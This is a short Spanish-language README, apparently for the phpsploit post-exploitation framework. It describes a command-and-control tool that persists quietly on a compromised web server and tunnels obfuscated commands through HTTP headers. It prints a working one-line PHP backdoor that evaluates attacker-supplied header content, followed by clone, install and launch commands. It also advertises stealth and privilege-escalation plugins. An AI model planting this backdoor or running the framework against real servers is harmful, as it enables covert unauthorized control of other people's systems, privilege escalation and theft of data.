
Framework C2 completo que persiste silenciosamente en un servidor web con una puerta trasera PHP de una sola línea.
La comunicación ofuscada se logra utilizando cabeceras HTTP en peticiones estándar del cliente y respuestas relativas del servidor web, tunelizada a través de una pequeña puerta trasera polimórfica:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
Eficiente: Más de 20 plugins para automatizar tareas de escalada de privilegios
Sigilo: El framework está hecho por paranoicos, para paranoicos
Conveniente: Una interfaz robusta con muchas características cruciales
help)Gracias a estas maravillosas personas:
Este proyecto sigue la especificación all-contributors. Se aceptan contribuciones de cualquier tipo
![]() Sujit Ghosal 📝 |
![]() Zerdoumi 🐛 |
![]() tristandostaler 🐛 | ![]() Rohan Tarai 🐛 | ![]() Jonas Lejon 📝 |